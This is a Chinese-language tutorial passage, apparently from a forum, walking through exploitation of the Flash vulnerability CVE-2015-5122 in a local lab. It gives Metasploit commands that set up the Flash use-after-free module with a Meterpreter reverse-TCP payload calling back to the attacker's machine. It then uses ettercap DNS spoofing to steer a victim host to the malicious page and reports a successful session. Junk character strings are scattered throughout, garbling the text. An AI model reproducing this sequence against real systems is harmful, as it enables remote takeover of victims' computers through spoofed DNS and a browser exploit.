8 [& L I, O Y7 g 二、cve2015-5122漏洞实例演示虚拟机
5 q! B |! c& O& l s6 m7 G7 a ; n% z% ^0 [; W' u0 \. E
H! z, H% z% z
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 8 a5 l- U- r* @- y
* ^: x9 Q& C- x0 i5 z& x/ o& f, b. T" M! z* |3 c8 c& z2 J
search cve-2015-5122如图:
: d" |+ W* r5 L( y3 @& T# W0 o ! ~. p" k1 n9 J: `" G( W/ z
" N7 U; T# d0 {% I7 K0 q! o( a
, u# _8 o! y" `; g3 N , B, v3 W* c7 I( o
2 q \# ?' `' d: ^4 A4 |# y$ B, `$ q
下面我们敲如下命令: 3 p# ?1 m2 p3 K" M
1 W$ ]& {7 p3 ]3 \7 n. S
5 Y3 X9 J+ f: S+ j use exploit/multi/browser/adobe_flash_opaque_background_uaf
9 c1 q. ?9 p* k* B6 {( W
3 S# A& o' D6 [1 T+ ~! C8 f: x
: Z# L$ X4 P8 q6 Q. R9 N5 i+ f9 h5 p* } set PAYLOAD windows/meterpreter/reverse_tcp
* {. p: s; l# d/ H+ n6 U" B & [3 y/ V% k; O" E. Q$ d' P9 K
* t5 o: E# D6 F) S9 e0 x+ s' u4 {1 m
set LHOST 192.168.0.109
$ n/ {" b0 W7 d2 z3 x" P8 `& `% a
; U" e g0 a* G/ ~( P- u/ Q+ ?, L6 A
set URIPATH / /*根目录*/
! ]! }3 F7 t9 Y& E! p ( o- ^% l9 _+ I5 ~/ { ^
- ~/ x" u; T1 ^7 F2 N! P5 i set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
; _# p1 Q; x% f |. W " S! }. F$ P# H1 Y4 ~# L
J: y. e5 {' W. M2 G; k3 V/ d+ m* B* U set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
: M( k6 s% l1 {$ K( Y0 P 1 Q, }7 q! H e4 P9 z7 P) Y
) F+ X; j* A$ T; U
然后show options如图: # ]- j5 Q3 x% Y6 N
9 u4 A7 h I! ?
& m: r7 o' w8 u$ [4 b: U* C; @
8 C' a. o) e8 r ) y& p, O, K% K5 B# N) D
/ }. {2 f% _- \$ [ D/ w( ~8 p 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
& M% w$ y( L' K, ] ?
% U% q' {, L7 ^' f! I$ u9 f( b2 z
% S' t" e2 l+ L" E" Z; v
- r$ l3 Z0 g& g" _5 z! P2 k 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
5 }2 F) Q7 B2 P
8 ~4 ?# T# G# T% U
; k9 q, ^: V% p& X1 e0 X Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf . p; t5 C# ]; f; _
) H* X; v' t# D( C% V1 {0 }; b
. Q; V ~3 c: e* E! W: t
3 f3 M/ ]& S$ e# |8 `( |0 V# ~
- b0 j7 I$ k8 E# s0 c
% |/ y5 R; |4 R0 i 成功了,这时候我们断开ettercap,如图: ; b+ w8 C* Q2 Q( t/ `0 ]; o9 u
: F( ?) @! B, w5 r* Q5 X4 H0 h4 h9 M6 Z9 d: c
. x' O" s3 L6 Y! N1 M
+ \0 D" H4 _ L) S9 g: w& s% L7 e
9 l, k* E0 X) ~; N0 g Screenshot如图: a; a1 s6 [4 Q) a/ J
8 ]+ y9 H3 ]; n/ i' r/ v6 R4 |; E( T% a- ?" E0 o
- N' u: [ P; _2 A
7 X3 K' k2 S, }) v( |9 a+ G3 d6 X
0 }$ Z' N4 A( w$ y7 l% q
6 l' W" a5 M9 M: g
|